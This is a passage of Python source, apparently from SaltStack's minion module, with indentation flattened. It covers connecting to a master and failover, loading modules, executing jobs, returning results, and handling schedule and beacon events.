self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment']
).compile_pillar()
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils,
include_errors=True)
# TODO: remove
self.function_errors = {} # Keep the funcs clean
self.returners = salt.loader.returners(self.opts, self.functions)
self.states = salt.loader.states(self.opts, self.functions)
self.rend = salt.loader.render(self.opts, self.functions)
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MinionBase(object):
def __init__(self, opts):
self.opts = opts
@staticmethod
def process_schedule(minion, loop_interval):
try:
minion.schedule.eval()
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if minion.schedule.loop_interval < loop_interval:
loop_interval = minion.schedule.loop_interval
log.debug(
'Overriding loop_interval because of scheduled jobs.'
)
except Exception as exc:
log.error(
'Exception {0} occurred in scheduled job'.format(exc)
)
return loop_interval
def process_beacons(self, functions):
'''
Evaluate all of the configured beacons, grab the config again in case
the pillar or grains changed
'''
if 'config.merge' in functions:
b_conf = functions['config.merge']('beacons')
if b_conf:
return self.beacons.process(b_conf)
return []
class MasterMinion(object):
'''
Create a fully loaded minion function object for generic use on the
master. What makes this class different is that the pillar is
omitted; otherwise everything else is loaded cleanly.
'''
def __init__(
self,
opts,
returners=True,
states=True,
rend=True,
matcher=True,
whitelist=None):
self.opts = salt.config.minion_config(opts['conf_file'])
self.opts.update(opts)
self.whitelist = whitelist
self.opts['grains'] = salt.loader.grains(opts)
self.opts['pillar'] = {}
self.mk_returners = returners
self.mk_states = states
self.mk_rend = rend
self.mk_matcher = matcher
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(
self.opts,
utils=self.utils,
whitelist=self.whitelist,
initial_load=initial_load)
if self.mk_returners:
self.returners = salt.loader.returners(self.opts, self.functions)
if self.mk_states:
self.states = salt.loader.states(self.opts, self.functions)
if self.mk_rend:
self.rend = salt.loader.render(self.opts, self.functions)
if self.mk_matcher:
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MultiMinion(MinionBase):
'''
Create a multi-minion interface: this creates as many minions as there
are masters defined in the master option and binds each minion object
to its respective master.
'''
# timeout for one of the minions to auth with a master
MINION_CONNECT_TIMEOUT = 5
def __init__(self, opts):
super(MultiMinion, self).__init__(opts)
self.auth_wait = self.opts['acceptance_wait_time']
self.max_wait = self.opts['acceptance_wait_time_max']
self.io_loop = zmq.eventloop.ioloop.ZMQIOLoop()
def _spawn_minions(self):
'''
Spawn all the coroutines which will sign in to masters
'''
if not isinstance(self.opts['master'], list):
log.error(
'Attempting to start a multimaster system with one master')
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
for master in set(self.opts['master']):
s_opts = copy.deepcopy(self.opts)
s_opts['master'] = master
s_opts['multimaster'] = True
s_opts['auth_timeout'] = self.MINION_CONNECT_TIMEOUT
self.io_loop.spawn_callback(self._connect_minion, s_opts)
@tornado.gen.coroutine
def _connect_minion(self, opts):
'''
Create a minion, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = opts['acceptance_wait_time']
while True:
try:
minion = Minion(opts,
self.MINION_CONNECT_TIMEOUT,
False,
io_loop=self.io_loop,
loaded_base_name='salt.loader.{0}'.format(opts['master']),
)
yield minion.connect_master()
minion.tune_in(start=False)
break
except SaltClientError as exc:
log.error('Error while bringing up minion for multi-master. Is master at {0} responding?'.format(opts['master']))
last = time.time()
if auth_wait < self.max_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except Exception as e:
log.critical('Unexpected error while connecting to {0}'.format(opts['master']), exc_info=True)
# Multi Master Tune In
def tune_in(self):
'''
Bind to the masters
This loop will attempt to create connections to masters it hasn't connected
to yet, but once the initial connection is made it is up to ZMQ to do the
reconnect (don't know of an API to get the state here in salt)
'''
# Fire off all the minion coroutines
self.minions = self._spawn_minions()
# serve forever!
self.io_loop.start()
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True, loaded_base_name=None, io_loop=None): # pylint: disable=W0231
'''
Pass in the options dict
'''
# this means that the parent class doesn't know *which* master we connect to
super(Minion, self).__init__(opts)
self.timeout = timeout
self.safe = safe
self._running = None
self.win_proc = []
self.loaded_base_name = loaded_base_name
self.io_loop = io_loop or zmq.eventloop.ioloop.ZMQIOLoop()
if not self.io_loop.initialized():
self.io_loop.install()
# Warn if ZMQ < 3.2
if HAS_ZMQ:
try:
zmq_version_info = zmq.zmq_version_info()
except AttributeError:
# PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to
# using zmq.zmq_version() and build a version info tuple.
zmq_version_info = tuple(
[int(x) for x in zmq.zmq_version().split('.')]
)
if zmq_version_info < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
# Late setup of the opts grains, so we can log from the grains
# module
self.opts['grains'] = salt.loader.grains(opts)
# TODO: remove?
def sync_connect_master(self):
'''
Block until we are connected to a master
'''
self._connect_master_future = self.connect_master()
# finish connecting to master
self._connect_master_future.add_done_callback(lambda f: self.io_loop.stop())
self.io_loop.start()
if self._connect_master_future.exception():
raise self._connect_master_future.exception()
@tornado.gen.coroutine
def connect_master(self):
'''
Return a future which will complete when you are connected to a master
'''
master, self.pub_channel = yield self.eval_master(self.opts, self.timeout, self.safe)
self._post_master_init(master)
# TODO: better name...
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
'''
self.opts['master'] = master
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment']
).compile_pillar()
self.functions, self.returners, self.function_errors = self._load_modules()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
# add default scheduling jobs to the minion's scheduler
if 'mine.update' in self.functions:
log.info('Added mine.update to scheduler')
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2
}
})
# add master_alive job if enabled
if self.opts['master_alive_interval'] > 0:
self.schedule.add_job({
'__master_alive':
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
})
self.grains_cache = self.opts['grains']
if 'proxy' in self.opts['pillar']:
log.debug('I am {0} and I need to start some proxies for {1}'.format(self.opts['id'],
self.opts['pillar']['proxy']))
for p in self.opts['pillar']['proxy']:
log.debug('Starting {0} proxy.'.format(p))
pid = os.fork()
if pid > 0:
continue
else:
proxyminion = ProxyMinion(self.opts)
proxyminion.start(self.opts['pillar']['proxy'][p])
self.clean_die(signal.SIGTERM, None)
else:
log.debug('I am {0} and I am not supposed to start any proxies. '
'(Likely not a problem)'.format(self.opts['id']))
@tornado.gen.coroutine
def eval_master(self,
opts,
timeout=60,
safe=True,
failed=False):
'''
Evaluates and returns a tuple of the current master address and the pub_channel.
In standard mode, just creates a pub_channel with the given master address.
With master_type=func evaluates the current master address from the given
module and then creates a pub_channel.
With master_type=failover takes the list of masters and loops through them.
The first one that allows the minion to create a pub_channel is then
returned. If this function is called outside the minion's initialization
phase (for example from the minion's main event-loop when a master connection
loss was detected), 'failed' should be set to True. The current
(possibly failed) master will then be removed from the list of masters.
'''
# check if master_type was altered from its default
if opts['master_type'] != 'str':
# check for a valid keyword
if opts['master_type'] == 'func':
# split module and function and try loading the module
mod, fun = opts['master'].split('.')
try:
master_mod = salt.loader.raw_mod(opts, mod, fun)
if not master_mod:
raise TypeError
# we take whatever the module returns as master address
opts['master'] = master_mod[mod + '.' + fun]()
except TypeError:
msg = ('Failed to evaluate master address from '
'module \'{0}\''.format(opts['master']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
log.info('Evaluated master from module: {0}'.format(master_mod))
# if failover is set, master has to be of type list
elif opts['master_type'] == 'failover':
if isinstance(opts['master'], list):
log.info('Got list of available master addresses:'
' {0}'.format(opts['master']))
if opts['master_shuffle']:
shuffle(opts['master'])
elif opts['__role'] == 'syndic':
log.info('Syndic setting master_syndic to \'{0}\''.format(opts['master']))
# if failed=True, the minion was previously connected
# we're probably called from the minion's main event-loop
# because a master connection loss was detected. remove
# the possibly failed master from the list of masters.
elif failed:
log.info('Removing possibly failed master {0} from list of'
' masters'.format(opts['master']))
# create a new list of masters with the possibly failed one removed
opts['master'] = [x for x in opts['master_list'] if opts['master'] != x]
else:
msg = ('master_type set to \'failover\' but \'master\' '
'is not of type list but of type '
'{0}'.format(type(opts['master'])))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
else:
msg = ('Invalid keyword \'{0}\' for variable '
'\'master_type\''.format(opts['master_type']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# if we have a list of masters, loop through them and be
# happy with the first one that allows us to connect
if isinstance(opts['master'], list):
conn = False
# shuffle the masters and then loop through them
local_masters = copy.copy(opts['master'])
for master in local_masters:
opts['master'] = master
opts.update(resolve_dns(opts))
super(Minion, self).__init__(opts) # TODO: only run init once?? This will run once per attempt
# on first run, update self.opts with the whole master list
# to enable a minion to re-use old masters if they get fixed
if 'master_list' not in opts:
opts['master_list'] = local_masters
try:
pub_channel = salt.transport.client.AsyncPubChannel.factory(opts,
timeout=timeout,
safe=safe,
io_loop=self.io_loop,
)
yield pub_channel.connect()
conn = True
break
except SaltClientError:
msg = ('Master {0} could not be reached, trying '
'next master (if any)'.format(opts['master']))
log.info(msg)
continue
if not conn:
self.connected = False
msg = ('No master could be reached or all masters denied '
'the minion\'s connection attempt.')
log.error(msg)
else:
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
# single master sign in
else:
opts.update(resolve_dns(opts))
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts,
timeout=timeout,
safe=safe,
io_loop=self.io_loop,
)
yield pub_channel.connect()
self.tok = pub_channel.auth.gen_token('salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in six.iteritems(self.opts):
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _process_beacons(self):
'''
Process each beacon and send events if appropriate
'''
# Process Beacons
try:
beacons = self.process_beacons(self.functions)
except Exception as exc:
log.critical('Beacon processing errored: {0}. No beacons will be processed.'.format(traceback.format_exc()))
beacons = None
if beacons:
self._fire_master(events=beacons)
for beacon in beacons:
serialized_data = salt.utils.dicttrim.trim_dict(
self.serial.dumps(beacon['data']),
self.opts.get('max_event_size', 1048576),
is_msgpacked=True,
)
log.debug('Sending event - data = {0}'.format(beacon['data']))
event = '{0}{1}{2}'.format(
beacon['tag'],
salt.utils.event.TAGEND,
serialized_data,
)
self.handle_event(event)
self.epub_sock.send(event)
def _load_modules(self, force_refresh=False, notify=False):
'''
Return the functions and the returners loaded up from the loader
module
'''
# if this is a *nix system AND modules_max_memory is set, lets enforce
# a memory limit on module imports
# this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
modules_max_memory = False
if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
log.debug('modules_max_memory set, enforcing a maximum of {0}'.format(self.opts['modules_max_memory']))
modules_max_memory = True
old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
rss, vms = psutil.Process(os.getpid()).get_memory_info()
mem_limit = rss + vms + self.opts['modules_max_memory']
resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
elif self.opts.get('modules_max_memory', -1) > 0:
if not HAS_PSUTIL:
log.error('Unable to enforce modules_max_memory because psutil is missing')
if not HAS_RESOURCE:
log.error('Unable to enforce modules_max_memory because resource is missing')
self.opts['grains'] = salt.loader.grains(self.opts, force_refresh)
self.utils = salt.loader.utils(self.opts)
if self.opts.get('multimaster', False):
s_opts = copy.deepcopy(self.opts)
functions = salt.loader.minion_mods(s_opts, utils=self.utils,
loaded_base_name=self.loaded_base_name, notify=notify)
else:
functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=notify)
returners = salt.loader.returners(self.opts, functions)
errors = {}
if '_errors' in functions:
errors = functions['_errors']
functions.pop('_errors')
# we're done, reset the limits!
if modules_max_memory is True:
resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
return functions, returners, errors
def _fire_master(self, data=None, tag=None, events=None, pretag=None, timeout=60):
'''
Fire an event on the master, or drop message if unable to send.
'''
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
elif not data and tag:
load['data'] = {}
load['tag'] = tag
else:
return
channel = salt.transport.Channel.factory(self.opts)
try:
result = channel.send(load, timeout=timeout)
return True
except Exception:
log.info('fire_master failed: {0}'.format(traceback.format_exc()))
return False
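# Illustrative sketch of the load sent to the master (hypothetical values):
#     self._fire_master(data={'result': True}, tag='custom/event')
#     # sends roughly:
#     # {'id': 'minion01', 'cmd': '_minion_event', 'pretag': None,
#     #  'tok': <auth token>, 'data': {'result': True}, 'tag': 'custom/event'}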
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
if 'user' in data:
log.info(
'User {0[user]} Executing command {0[fun]} with jid '
'{0[jid]}'.format(data)
)
else:
log.info(
'Executing command {0[fun]} with jid {0[jid]}'.format(data)
)
log.debug('Command details {0}'.format(data))
if isinstance(data['fun'], six.string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners, self.function_errors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
target = Minion._thread_multi_return
else:
target = Minion._thread_return
# We stash an instance reference to allow for socket
# communication on Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
if self.opts['multiprocessing']:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
process = multiprocessing.Process(
target=target, args=(instance, self.opts, data)
)
else:
process = threading.Thread(
target=target,
args=(instance, self.opts, data),
name=data['jid']
)
process.start()
if not sys.platform.startswith('win'):
process.join()
else:
self.win_proc.append(process)
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if not minion_instance:
minion_instance = cls(opts)
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing']:
salt.utils.daemonize_if(opts)
salt.utils.appendproctitle(data['jid'])
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID {0}'.format(sdata['pid']))
with salt.utils.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
if function_name in minion_instance.functions:
try:
func = minion_instance.functions[data['fun']]
args, kwargs = load_args_and_kwargs(
func,
data['arg'],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
if opts.get('sudo_user', ''):
sudo_runas = opts.get('sudo_user')
if 'sudo.salt_call' in minion_instance.functions:
return_data = minion_instance.functions['sudo.salt_call'](
sudo_runas,
data['fun'],
*args,
**kwargs)
else:
return_data = func(*args, **kwargs)
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, dict):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], str(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
ret['retcode'] = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
ret['success'] = True
except CommandNotFoundError as exc:
msg = 'Command required for {0!r} not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
except CommandExecutionError as exc:
log.error(
'A command in {0!r} had a problem: {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR: {0}'.format(exc)
ret['out'] = 'nested'
except SaltInvocationError as exc:
log.error(
'Problem executing {0!r}: {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR executing {0!r}: {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
except TypeError as exc:
msg = 'Passed invalid arguments: {0}\n{1}'.format(exc, func.__doc__)
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret['return'] = msg
ret['out'] = 'nested'
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
else:
ret['return'] = minion_instance.functions.missing_fun_string(function_name)
mod_name = function_name.split('.')[0]
if mod_name in minion_instance.function_errors:
ret['return'] += ' Possible reasons: {0!r}'.format(minion_instance.function_errors[mod_name])
ret['success'] = False
ret['retcode'] = 254
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'master_id' in data:
ret['master_id'] = data['master_id']
if 'metadata' in data:
if isinstance(data['metadata'], dict):
ret['metadata'] = data['metadata']
else:
log.warning('The metadata parameter must be a dictionary. Ignoring.')
minion_instance._return_pub(ret)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
log.error(traceback.format_exc())
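# Illustrative sketch of the return payload assembled above (hypothetical
# values for a successful test.ping call):
#     {'success': True, 'return': True, 'retcode': 0,
#      'jid': '20230101010101123456', 'fun': 'test.ping', 'fun_args': []}
# plus optional 'master_id'/'metadata' keys when present in the publish data.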
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
salt.utils.appendproctitle(data['jid'])
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if not minion_instance:
minion_instance = cls(opts)
ret = {
'return': {},
'success': {},
}
for ind in range(0, len(data['fun'])):
ret['success'][data['fun'][ind]] = False
try:
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = load_args_and_kwargs(
func,
data['arg'][ind],
data)
ret['return'][data['fun'][ind]] = func(*args, **kwargs)
ret['success'][data['fun'][ind]] = True
except Exception as exc:
trb = traceback.format_exc()
log.warning(
'The minion function caused an exception: {0}'.format(
exc
)
)
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'metadata' in data:
ret['metadata'] = data['metadata']
minion_instance._return_pub(ret)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
def _return_pub(self, ret, ret_cmd='_return', timeout=60):
'''
Return the data from the executed command to the master server
'''
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: {0}'.format(jid))
channel = salt.transport.Channel.factory(self.opts)
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['id'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__')}
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
load['return'] = {}
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error('Invalid outputter {0}. This is likely a bug.'
.format(ret['out']))
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
fn_ = os.path.join(
self.opts['cachedir'],
'minion_jobs',
load['jid'],
'return.p')
jdir = os.path.dirname(fn_)
if not os.path.isdir(jdir):
os.makedirs(jdir)
salt.utils.fopen(fn_, 'w+b').write(self.serial.dumps(ret))
try:
ret_val = channel.send(load, timeout=timeout)
except SaltReqTimeoutError:
msg = ('The minion failed to return the job information for job '
'{0}. This is often due to the master being shut down or '
'overloaded. If the master is running consider increasing '
'the worker_threads value.').format(jid)
log.warn(msg)
return ''
log.trace('ret_val = {0}'.format(ret_val))
return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
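# Illustrative sketch of the minion config values that drive the branches
# above (hypothetical settings):
#     startup_states: sls        -> state.sls with sls_list
#     startup_states: top        -> state.top with top_file
#     startup_states: highstate  -> state.highstate with no arguments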
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Schedule a recurring job that fires a grains_refresh event, triggering a pillar refresh that informs the master about changes in this minion's grains
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# dup name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def module_refresh(self, force_refresh=False, notify=False):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing modules. Notify={0}'.format(notify))
self.functions, self.returners, _ = self._load_modules(force_refresh, notify=notify)
self.schedule.functions = self.functions
self.schedule.returners = self.returners
def pillar_refresh(self, force_refresh=False):
'''
Refresh the pillar
'''
log.debug('Refreshing pillar')
try:
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
).compile_pillar()
except SaltClientError:
# Do not exit if a pillar refresh fails.
log.error('Pillar data could not be refreshed. '
'One or more masters may be down!')
self.module_refresh(force_refresh)
def manage_schedule(self, package):
'''
Manage the minion's scheduled jobs (add, delete, modify, enable, disable, run or reload) based on event data.
'''
tag, data = salt.utils.event.MinionEvent.unpack(package)
func = data.get('func', None)
name = data.get('name', None)
schedule = data.get('schedule', None)
where = data.get('where', None)
if func == 'delete':
self.schedule.delete_job(name)
elif func == 'add':
self.schedule.add_job(schedule)
elif func == 'modify':
self.schedule.modify_job(name, schedule, where)
elif func == 'enable':
self.schedule.enable_schedule()
elif func == 'disable':
self.schedule.disable_schedule()
elif func == 'enable_job':
self.schedule.enable_job(name, where)
elif func == 'run_job':
self.schedule.run_job(name, where)
elif func == 'disable_job':
self.schedule.disable_job(name, where)
elif func == 'reload':
self.schedule.reload(schedule)
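# Illustrative sketch (hypothetical values) of the event data this handler
# expects after MinionEvent.unpack():
#     {'func': 'add',
#      'name': 'job1',
#      'schedule': {'job1': {'function': 'test.ping', 'seconds': 60}}}
# Functions such as 'delete', 'enable_job' or 'disable_job' only need 'name'
# (and optionally 'where') instead of a full schedule definition.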
def manage_beacons(self, package):
'''
Manage Beacons
'''
tag, data = salt.utils.event.MinionEvent.unpack(package)
func = data.get('func', None)
name = data.get('name', None)
beacon_data = data.get('beacon_data', None)
if func == 'add':
self.beacons.add_beacon(name, beacon_data)
if func == 'delete':
self.beacons.delete_beacon(name)
def environ_setenv(self, package):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
tag, data = salt.utils.event.MinionEvent.unpack(package)
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
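# Illustrative sketch (hypothetical values) of the event data consumed above:
#     {'environ': {'FOO': 'bar', 'BAZ': False},
#      'false_unsets': True,
#      'clear_all': False}
# false_unsets and clear_all are passed straight through to
# salt.modules.environ.setenv().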
def clean_die(self, signum, frame):
'''
Python does not handle SIGTERM cleanly by default; if it is signaled,
exit the minion process cleanly
'''
self._running = False
exit(0)
def _pre_tune(self):
'''
Set the minion running flag and issue the appropriate warnings if
the minion cannot be started or is already running
'''
if self._running is None:
self._running = True
elif self._running is False:
log.error(
'This {0} was scheduled to stop. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
elif self._running is True:
log.error(
'This {0} is already running. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
try:
log.info(
'{0} is starting as user \'{1}\''.format(
self.__class__.__name__,
salt.utils.get_user()
)
)
except Exception as err:
# Only windows is allowed to fail here. See #3189. Log as debug in
# that case. Else, error.
log.log(
salt.utils.is_windows() and logging.DEBUG or logging.ERROR,
'Failed to get the user who is starting {0}'.format(
self.__class__.__name__
),
exc_info=err
)
def _mine_send(self, package):
'''
Send mine data to the master
'''
channel = salt.transport.Channel.factory(self.opts)
load = salt.utils.event.SaltEvent.unpack(package)[1]
load['tok'] = self.tok
ret = channel.send(load)
return ret
def handle_event(self, package):
'''
Handle an event from the epull_sock (all local minion events)
'''
log.debug('Handling event {0!r}'.format(package))
if package.startswith('module_refresh'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
self.module_refresh(notify=data.get('notify', False))
elif package.startswith('pillar_refresh'):
self.pillar_refresh()
elif package.startswith('manage_schedule'):
self.manage_schedule(package)
elif package.startswith('manage_beacons'):
self.manage_beacons(package)
elif package.startswith('grains_refresh'):
if self.grains_cache != self.opts['grains']:
self.pillar_refresh(force_refresh=True)
self.grains_cache = self.opts['grains']
elif package.startswith('environ_setenv'):
self.environ_setenv(package)
elif package.startswith('_minion_mine'):
self._mine_send(package)
elif package.startswith('fire_master'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
log.debug('Forwarding master event tag={tag}'.format(tag=data['tag']))
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
elif package.startswith('__master_disconnected'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
# if the master disconnect event is for a different master, raise an exception
if data['master'] != self.opts['master']:
raise Exception()
if self.connected:
# we are not connected anymore
self.connected = False
# modify the scheduled job to fire only on reconnect
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master': self.opts['master'],
'connected': False}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
log.info('Connection to master {0} lost'.format(self.opts['master']))
if self.opts['master_type'] == 'failover':
log.info('Trying to tune in to next master from master-list')
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
self.opts['master'] = self.eval_master(opts=self.opts,
failed=True)
if self.connected:
# re-init the subsystems to work with the new master
log.info('Re-initialising subsystems for new '
'master {0}'.format(self.opts['master']))
del self.pub_channel
self._connect_master_future = self.connect_master()
self.block_until_connected() # TODO: remove
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# update scheduled job to run with the new master addr
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
elif package.startswith('__master_connected'):
# handle this event only once. otherwise it will pollute the log
if not self.connected:
log.info('Connection to master {0} re-established'.format(self.opts['master']))
self.connected = True
# modify the __master_alive job to only fire,
# if the connection is lost again
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
elif package.startswith('_salt_error'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
log.debug('Forwarding salt error event tag={tag}'.format(tag=tag))
self._fire_master(data, tag)
def _fallback_cleanups(self):
'''
